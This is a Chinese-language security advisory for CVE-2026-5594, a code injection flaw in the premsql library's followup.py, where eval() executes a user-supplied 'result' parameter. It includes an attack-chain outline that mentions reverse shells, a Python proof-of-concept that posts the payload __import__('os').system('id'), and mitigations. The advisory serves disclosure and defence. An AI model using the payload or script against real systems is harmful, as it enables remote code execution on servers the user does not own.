CVE-2026-5594 CVSS 6.3 中危

CVE-2026-5594 premsql代码注入漏洞

披露日期: 2026-04-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5594

漏洞类型

代码注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

premAI-io premsql

漏洞概述

premAI-io premsql 0.2.1及之前版本存在代码注入漏洞。该漏洞源于`premsql/agents/baseline/workers/followup.py`文件中的`eval`函数未正确过滤用户输入的`result`参数。攻击者可通过构造恶意参数远程执行任意代码，导致系统被完全控制。目前该漏洞利用代码已公开，厂商尚未响应。

技术细节

该漏洞具体存在于premsql库的`premsql/agents/baseline/workers/followup.py`脚本中。问题根源在于开发人员使用了Python内置的`eval()`函数来处理名为`result`的参数。在Python中，`eval()`具有动态执行字符串表达式的能力，如果该字符串来源于不可信的用户输入且未经任何清洗或过滤，将导致严重的安全风险。在此案例中，攻击者可以构造包含恶意Python语句的Payload（例如`__import__('os').system('whoami')`），并将其赋值给`result`参数。当服务器端逻辑调用该函数时，恶意代码即被解释执行。由于CVSS向量显示为网络攻击面（AV:N）且无需用户交互（UI:N），攻击者可以通过发送特制的网络数据包远程触发该漏洞，从而获取服务器端的操作权限，进一步发起横向移动或数据窃取。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在使用premsql 0.2.1或更早版本，并确定存在接受`result`参数的API接口。

STEP 2

构造载荷

攻击者编写包含恶意Python代码的字符串，利用`eval()`函数的特性，设计旨在执行系统命令的Payload。

STEP 3

漏洞利用

攻击者向目标服务器发送特制的HTTP请求，将恶意代码注入到`result`参数中。

STEP 4

代码执行

服务器端`followup.py`处理请求，调用`eval()`函数解析`result`参数，导致恶意代码在服务器上下文中执行。

STEP 5

建立控制

利用执行的代码反弹Shell或读取敏感文件，从而控制受影响的服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example, needs to be adjusted based on actual deployment)
target_url = "http://127.0.0.1:8000/api/endpoint"

# The vulnerability lies in the 'result' argument being passed to eval()
# PoC payload to execute a system command (e.g., 'id')
malicious_payload = "__import__('os').system('id')"

# Construct the data payload expected by the vulnerable application
data = {
    "result": malicious_payload
}

try:
    print("[+] Sending PoC payload to target...")
    response = requests.post(target_url, json=data)
    
    # Check if the request was processed
    if response.status_code == 200:
        print("[+] Request sent successfully. Check for command execution.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

premAI-io premsql <= 0.2.1

防御指南

临时缓解措施

由于厂商尚未响应，建议在网络层面限制对受影响服务的访问，仅允许受信任的内部IP调用；或在应用网关处部署WAF规则，检测并拦截包含常见Python函数调用（如__import__, os.system）的恶意请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5594
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5594
3 Details https://www.cvedetails.com/cve/CVE-2026-5594/
4 VulDB https://vuldb.com/cve/CVE-2026-5594
5 Link https://github.com/Ka7arotto/cve/blob/main/premsql-rce/issue.md
6 Link https://github.com/Ka7arotto/cve/blob/main/premsql-rce/poc.py
7 Link https://vuldb.com/submit/784462
8 Link https://vuldb.com/vuln/355388
9 Link https://vuldb.com/vuln/355388/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表